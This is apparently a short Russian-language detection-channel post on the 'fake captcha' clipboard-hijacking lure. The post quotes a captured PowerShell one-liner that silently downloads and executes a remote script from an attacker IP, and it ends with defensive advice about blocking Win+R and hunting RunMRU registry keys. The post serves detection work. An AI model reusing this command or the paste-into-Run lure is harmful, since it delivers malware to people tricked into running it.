Сегодня рассмотрим технику fake captcha
Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖
Капча необычная, есть нюанс - используется техника "
clipboard hijacking" или "pastejacking" - в буфер обмена добавляется вредоносный скрипт, далее нужно нажать сочетание клавиш Win+R, далее в появившемся окне нажать Ctrl+V , и подтвердить, что вы молодец - Verify 🦣В буфер обмена вставлялся вот такой скрипт:
powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"Для формирования url, считается количество секунд между двумя датами.
🔭 Что делать:
🔤 запретить пользователям Win + R ❌
🔤 отслеживать создание новых ключей в ветке реестра
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
Для ханта, необходимо собрать значения ключей
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ всех пользователей, и провести анализ. Можно предусмотреть исключения, что-то могли использовать админы #detection@detectioneasy
#ttp@detectioneasy
